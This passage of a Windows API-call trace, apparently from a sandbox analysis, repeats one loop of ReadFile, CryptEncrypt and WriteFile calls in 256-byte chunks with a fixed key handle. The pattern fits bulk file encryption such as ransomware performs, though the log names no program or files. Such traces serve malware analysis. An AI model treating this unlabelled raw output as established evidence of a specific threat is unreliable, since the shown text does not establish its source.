dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.412] GetLastError () returned 0x0 [0172.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.412] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.412] GetLastError () returned 0x0 [0172.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.412] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.412] GetLastError () returned 0x0 [0172.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.412] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.412] GetLastError () returned 0x0 [0172.412] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.412] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.412] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.412] GetLastError () returned 0x0 [0172.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.413] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.413] GetLastError () returned 0x0 [0172.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.413] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.413] GetLastError () returned 0x0 [0172.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.413] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.413] GetLastError () returned 0x0 [0172.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.413] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.413] GetLastError () returned 0x0 [0172.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.413] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.413] GetLastError () returned 0x0 [0172.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.413] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.413] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.413] GetLastError () returned 0x0 [0172.413] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.414] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.414] GetLastError () returned 0x0 [0172.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.414] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.414] GetLastError () returned 0x0 [0172.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.414] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.414] GetLastError () returned 0x0 [0172.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.414] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.414] GetLastError () returned 0x0 [0172.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.414] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.414] GetLastError () returned 0x0 [0172.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.414] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.414] GetLastError () returned 0x0 [0172.414] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.414] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.415] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.415] GetLastError () returned 0x0 [0172.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.415] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.415] GetLastError () returned 0x0 [0172.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.415] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.415] GetLastError () returned 0x0 [0172.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.415] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.415] GetLastError () returned 0x0 [0172.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.415] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.415] GetLastError () returned 0x0 [0172.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.415] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.415] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.415] GetLastError () returned 0x0 [0172.415] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.416] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.416] GetLastError () returned 0x0 [0172.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.416] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.416] GetLastError () returned 0x0 [0172.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.416] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.416] GetLastError () returned 0x0 [0172.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.416] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.416] GetLastError () returned 0x0 [0172.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.416] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.416] GetLastError () returned 0x0 [0172.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.416] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.416] GetLastError () returned 0x0 [0172.416] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.416] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.417] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.417] GetLastError () returned 0x0 [0172.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.417] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.417] GetLastError () returned 0x0 [0172.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.417] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.417] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.417] GetLastError () returned 0x0 [0172.417] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, 